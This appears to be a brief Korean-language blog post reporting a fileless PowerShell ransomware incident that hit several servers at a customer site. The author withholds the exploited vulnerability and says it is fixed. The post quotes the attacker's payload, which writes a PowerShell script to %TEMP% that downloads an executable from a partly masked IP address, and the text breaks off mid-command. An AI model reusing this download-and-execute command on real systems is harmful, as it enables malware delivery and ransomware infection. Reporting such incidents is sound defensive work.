SECURITY/해킹사고 사례
[해킹사고사례] 파일리스 공격 / Powershell fileless
파워쉘 파일리스 악성 코드 감염 사례 피해 사례 xxx 솔루션 사용 고객사 동일한 공격 벡터로 다수 서버 랜섬웨어에 감염 해커가 사용한 공격 방법 보안 취약점을 이용하여 원격 명령 실행 / 파월쉘 스크립트 실행 공격 벡터(보안 홀, 보안 취약점)는 민감 사항으로 기술 하지 않겠습니다. 현재는 취약점 보완 조치 완료됨. 원격에서 powershell script 실행 페이로드 "echo $client = New-Object System.Net.WebClient > %TEMP%\qaestaxxx.ps1 & echo $client.DownloadFile("http://1xx.5x.xx6.x7/ZdfxxxgU.exe","%TEMP%\0VCxxxE.exe") >> %TEMP%\qaestaxxx.ps1 & power..